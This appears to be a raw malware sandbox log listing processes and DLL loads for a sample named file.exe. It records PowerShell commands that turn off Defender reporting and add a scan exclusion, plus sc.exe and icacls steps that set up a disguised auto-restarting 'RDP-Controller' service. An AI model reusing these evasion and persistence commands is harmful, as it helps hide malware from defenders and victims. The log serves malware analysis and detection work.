Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe "C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe"
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7mmwpep245voy3fngkym99px3pj5vx36.bat"Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe "C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe "C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignoreJump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-ControllerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.aclJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 2656 -ip 2656
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2656 -s 1188
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: zlib1.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: dnsapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rasadhlp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: fwpuclnt.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
